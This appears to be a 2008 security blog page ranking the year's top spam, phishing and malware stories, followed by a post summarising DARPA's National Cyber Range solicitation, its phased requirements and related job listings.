Perhaps one of the top accomplishments by "the good guys" this year was the closing of McColo. This story coined the term "Internet Landfill" to describe those networks which exist only to host trash, filth, and crime on the Internet. Championing Journalist Brian Krebs lead the charge, and the Internet should send him a big Thank You. Perhaps more importantly than shutting down McColo, which resulted in a 2/3rds drop in Spam volumes world-wide, was the proof that we CAN do something about spam if we work together.

Number Nine


Demise of Index1.php PornTube Video malware






Number Eight


Enom Phishing Continues


October 29, 2008

Both Enom and Network Solutions, two major network domain registrars, had phishing campaigns against them back-to-back. We believe this lead to quite a few domain take overs later in the year, including financial services company Check Free. Using the stolen userids and passwords for the people who rightly control the domain name information, criminals logged in and redirected dozens of domains to a server they controlled.


Number Seven


CNN Lends Authenticity to News Spam


August 7, 2008

After several weeks of fake news headlines tricking readers into clicking on links which infected their computer, the spammers got a huge boost in their infection rates when they began to imitate CNN.


Number Six


Anti-Virus Products Still Fail on Fresh Malware


August 12, 2008

Three examples in this blog showed that current anti-virus products fail miserably when detecting fresh spam. Some of our examples, "in the wild" as evidenced by us finding them in our spam, were detected by as few as 5 out of 36 anti-virus products tested.


Number Five


Governor Palin's Email Security Questions in the Facebook Age


September 22, 2008

When 20-year-old David Kernell broke into Governor Palin's Yahoo account by Googling up the answers to her security questions, we took a minute to point out how foolish this security practice is in this time when everyone's personal information is online.



Number Four


More than 1 Million Ways to Infect Your Computer


December 23, 2008

A criminal uses malware to load thousands of websites with search terms to Open Redirector on many websites, including Microsoft.com and IRS.gov. This results in many search terms showing up in Google with the number one hit being a redirector that will infect the visitor with a fake anti-virus.

Number Three


Storm Worm: Amero to replace Dollar?


July 22, 2008

Remember the Storm Worm? In July it pretended to be a warning that the US Dollar was being replaced by a gold coin. The continued popularity of this page actually has nothing to do with security. Rumor after rumor has circulated that the "Amero" proves that Bush was planning to merge Canadanian, US, and Mexican currencies, and desparate tinfoil hat types keep Googling up my page.

Number Two


Computer Virus Masquerades as Obama Speech


November 5, 2008

A criminal who has been stealing userids and passwords since May gained perhaps his biggest collection yet as he creating a fake Obama acceptance speech which was widely spammed the morning after the election. If anyone visited the website to view the video, they would be trojaned and begin sending all of their login data to a computer in the Ukraine. This same criminal did dozens of spam and social engineering campaigns this year, primarily pretending to be a new "Digital Certificate" for your bank.

Number One


MSNBC "Breaking News" replaces CNN Spam Wave


August 13, 2008

One of the tricks the spammer's used to get people to infect themselves was to promise to show them videos. We later found malware which actually searched real news sites to select headlines which were then stuffed into the spam messages to give the spam timely relevance to the spam readers. When the spam began imitating MSNBC's Breaking News alerts, even more people found themselves infected, causing their own computers to begin sending spam as well.

What does a National Cyber Range do?

This week Aviation Week ran a story called DARPA Unveils Cyber Warfare Range. The article quotes Rance Walleston, the director of BAE Systems' Information Operations Initiative:

“It’s hard to know what you are actually going to get from a test in a laboratory against five computers when the capability you need has to function against five million computers,” he continues. “There’s nowhere to test that, so DARPA’s trying to put together a range with fidelity in many dimensions — such as the number and types of nodes and how they’re connected — so that you can accurately determine the effectiveness of some tool. The real trick will be how quickly you can upgrade the range to deal with changing threats.”


If you might be wondering, as I was, so "what will that really look like"? The media has been all over the place with this one. InfoWar Monitor calimed "The agency's National Cyber Range for cyberwar simulation would be similar to Star Trek's holodeck or a Snow Crash-style Metaverse". Noah Schiffman wrote in his Security Phreak blog that the project would cost "an estimated $30 billion", and got slash-dotted quite a bit calling the project "Doomed to Failure". (Interesting that one project could cost $30 billion, when their entire appropriation for FY09 was a little over THREE billion -- (see Department of Defense Appropriation FY09) -- "The fiscal year 2009 budget request for DARPA is $3,285,569,000, an increase of $326,493,000, more than 10 percent, over the fiscal year 2008".

I did a couple hundred pages of reading, so you, gentle reader, won't have to . . .

So how did this come about?



It started back in November 2007 with a call from DARPA's Michael VanPutte, who is the Program Manager of their Strategic Technology Office. They gave a two month comment period for people to describe what they thought a Cyber Range should do. (See: Request for Information on Cyber Network Range Capabilities (CNRC). Whatever responses they got were used to help decide what the requirement should be for a National Cyber Range, and the first pass of asking for proposals to build one was May 5, 2008. In that request, they asked for some quick responses (deadlined June 30, 2008) of people who might be able to build something like that. Theidea was that they would fund several competitive teams to see who could come up with something worthy of major long-term funding. A Proposers' Day Workshop was held on May 13-14, 2008 at the Hilton Washington Dulles, with a review of classified requirements the previous day at the Schafer Corporation for proposers.

The requirements that were shared that day boiled down to:

  • Conduct unbiased, quantitative and qualitative assessment of information assurance and survivability tools in a representative network environment.
  • Replicate complex, large-scale, heterogeneous networks and users in current and future Department of Defense (DoD) weapon systems and operations.
  • Enable multiple, independent, simultaneous experiments on the same infrastructure.
  • Enable realistic testing of Internet/Global-Information-Grid (GIG) scale research.
  • Develop and deploy revolutionary cyber testing capabilities.
  • Enable the use of the scientific method for rigorous cyber testing.


Proposer's Day gave a 2.5 hour briefing on the Project, with proposers able to fill out Q&A cards, which were then addressed during the afternoon session.

The following day was for people who were looking for Team members to pitch what they had to offer and what they were looking for to build a successful proposal team.


The solicitation gave a number of objectives, including the ability to replicate and operate large-scale military and government network enclaves, commercial and tactical wireless and control systems, and a method of being able to rapidly prototype, deploy, monitor, and evaluate tests, new research protocols

The Solicitation boiled down to three phases:

Phase I - Design Objectives: Proposers had at most six months to develop a Preliminary Design Review which would prove that they had an Initial Conceptual Design which might be able to be developed into Detailed Engineering Plans and a workable Concepts of Operation. Proposers who passed Phase I would receive funding to move into Phase II.

Phase II - Prototype Objectives: Proposers now have to do a few things:

Demonstration, to include:
- deploying two different host node recipes
- creating new recipes
- rapid testbed reconstruction
- test management
- time synch and auditing
- data collection tools, including packet captures, event log captures, malware event collection, and automated attacks
- a traffic generation system including incoming and outgoing email, automated port scanning, automated attacks, and simulated HTTP and other traffic
- human "replicants" who simulate the use of software products, browsers, media players and email clients
- replicated inter-enclave communication channels
- aggregating all sub-nodes into one large test bed
- dynamically freeing resources from one test and reassigning them to another

When its All Done, what will it be able to do?



Phase III: National Cyber Range Objectives:

One of the Phase II Demonstrators would be picked to fully deploy the National Cyber Range to meet the following objectives:

TASK 1 - INFRASTRUCTURE



Operational Resources - physical facilities, utilities, HVAC, security

Administration Resources - certification/accreditation, CONOP development, security management, test scheduling, operation of range processes

Demonstrations - facilities to demo for audiences of up to 30, with separate rooms for test control teams, Test Director, and OpFor (Oppositional Forces)

Node Replication - realistic replication of connections, hardware, and endpoints (firmware, hardware, software, apps)

Recipes - "a variety of node configurations" that would handle most potential operating environments

Network Technologies and Support - (make the network look like any network)

Protocols and Services - (allow the network to run any protocols)

Scalability - be able to deploy everything from single devices to tests incorporating several thousand nodes.

TASK 2 - RANGE MANAGEMENT



- Provide automated pre-test planning support
- Enable automated resource allocation based on needs and priorities
- Support both short (1 week) and long (6 month) research programs
- Provide a means to rapidly and securely de-obligate test resources after tests
- Enable free resources to be pooled and allocated to low priority, non-interactive, batch tests
- Provide a knowledge management suite for lessons learned (both within and across tests)
- Provide a means to incorporate additional technologies

TASK 3 - TEST MANAGEMENT



Facilitate the Test Director's activities by providing a palette of resources available, as well as products to assist in pre-test planning, test execution, data collection, post test analysis and closeout support.

Provide a knowledge management repository

Provide an automated means to configure, instrument, initialize, and verify assigned testbed resources

Provide means to execute, monitor, pause, continue, and stop tests.

Provide means to rapidly reset, modify and restart tests

Provide range validation with user-defined scripts

Support both interactive and batch testing paradigms

TASK 4 - TRANSPARENCY



Tests must be monitored for both quantitative and qualitative assessment, including instrumented monitoring and observer/controller evaluation and analysis

TASK 5 - QUALIFIED, ON-SITE SUPPORT TEAM



Provide a number of highly skilled, experienced network engineers, system administrators and domain administrators, with rapid response time and trouble ticketing system to track assistance requests.

TASK 6 - HUMAN INTERACTION AND REPLICATION



Allow players OR Automation, to fulfill the roles of:
- Oppositional Forces (OpFor), including both sophisticated cyber activity, defensive computing to protect national assets, and computer network attack, with facilities that can be controlled by OpFor isolated from Test Director's team.
- Team Integration
- Traffic Generators
- Human Actor Replicants and Program Activators (Host-based)



TASK 7 - EXTENSIBILITY



Deploy and/or replicate: LANs, WANs, Wireless of all softs, intermediate routing, C4 Systems (Military Command, Control, Communications, and Computers), US and Foreign military communications infrastructures, including satellite, satcom, maritime, tactical, and Mobile Ad Hoc Networks (MANETs), US and foreign military net-centric assets (including Unmanned Aerial Vehicles, Weapons, and Radar Systems)

TASK 8 - TIME DILATION/CONTRACTION



Develop technology to accelerate or decelerate test time to clock time

TASK 9 - ENCAPSULATION



Comply with all Security Classification Guidelines





WOW. OK, that sound very cool. Where are we right now?

Some folks are already hiring to help build out their phase II. For instance, CTC: Senior Systems Engineer, and L-3 Global Security and Engineering Solutions: Senior Systems Engineer, which was just posted yesterday. The latter wants someone with 17 years experience (14 if you have a PhD) to:

Participate in development of the Concept of Operations and prepare Preliminary Design Review (PDR) for large scale, multi-level secure, multi-floor National Cyber Range (NCR.) Apply Cyber Security engineering and Computer Forensics technology in design of a test bed (Range) capable of supporting multiple, simultaneous, segmented tests of emerging and future defensive and offensive Cyber technology. Plan, organize and structure operations of the Range. Specify staff roles, technical skills, training and certifications required to meet operational requirements.

Manage layout and physical design of facility and development of Test & Evaluation (T&E) processes. Coordinate pre-approval of Range physical and information security certifications and procedures during PDR development.


Do you believe? It might be a great time to get a great job!

Link: NCR Proposers' Day Briefing